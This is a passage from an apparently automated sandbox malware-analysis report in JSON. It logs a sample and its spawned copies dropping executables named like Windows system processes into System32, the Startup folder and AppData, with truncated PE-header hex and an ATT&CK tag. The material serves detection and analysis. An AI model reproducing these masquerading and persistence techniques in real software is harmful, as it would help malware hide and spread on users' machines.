...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46786 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46786 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46902 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46828 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46842 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46780 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46918 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46787 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 47046 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46794 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"afd9956a91044434722f1740999ac263643279f92b46eef2fd9e9c30d81d591f.exe\" wrote 46897 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46866 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46839 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46834 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46998 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46873 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46801 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46731 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46882 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46880 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"D3_08.exe\" wrote 46805 bytes starting with PE header signature to file \"C:\\D3_08\\New Folder.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46928 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46926 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46782 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46849 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46862 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46884 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46760 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"IExplorer.exe\" wrote 46785 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46806 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46840 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46756 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46934 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46889 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46844 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"WINLOGON.EXE\" wrote 46716 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46821 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46827 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46837 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46790 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"CSRSS.EXE\" wrote 46792 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46912 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46850 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46825 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46967 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46945 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46926 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46886 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46880 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46821 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46949 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SERVICES.EXE\" wrote 46758 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46805 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46782 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46928 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46919 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46728 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46846 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46762 bytes starting with PE header signature to file \"C:\\Windows\\System32\\IExplorer.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46986 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46684 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46934 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46889 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"LSASS.EXE\" wrote 46681 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46810 bytes starting with PE header signature to file \"C:\\D3_08.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46857 bytes starting with PE header signature to file \"C:\\Windows\\System32\\shell.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46886 bytes starting with PE header signature to file \"C:\\Windows\\System32\\MrD3_08.scr\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"SMSS.EXE\" wrote 46834 bytes starting with PE header signature to file \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"services.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\services.exe]- [targetUID: 00000000-00005816]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\D3_08.exe]- [targetUID: 00000000-00004308]\n \"shell.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\shell.exe]- [targetUID: 00000000-00004308]\n \"Empty.pif\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif]- [targetUID: 00000000-00004308]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\D3_08\\New Folder.exe]- [targetUID: 00000000-00005816]\n \"WINLOGON.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.EXE.67EE506D.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"CSRSS.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00004308]\n \"D3_08.EXE.67EE4741.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"IEXPLORER.EXE.67EE5073.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00004308]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00004308]\n \"IEXPLORER.EXE.67EE4745.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"MrD3_08.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\MrD3_08.scr]- [targetUID: 00000000-00004308]\n \"IEXPLORER.EXE.67EE4E36.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: 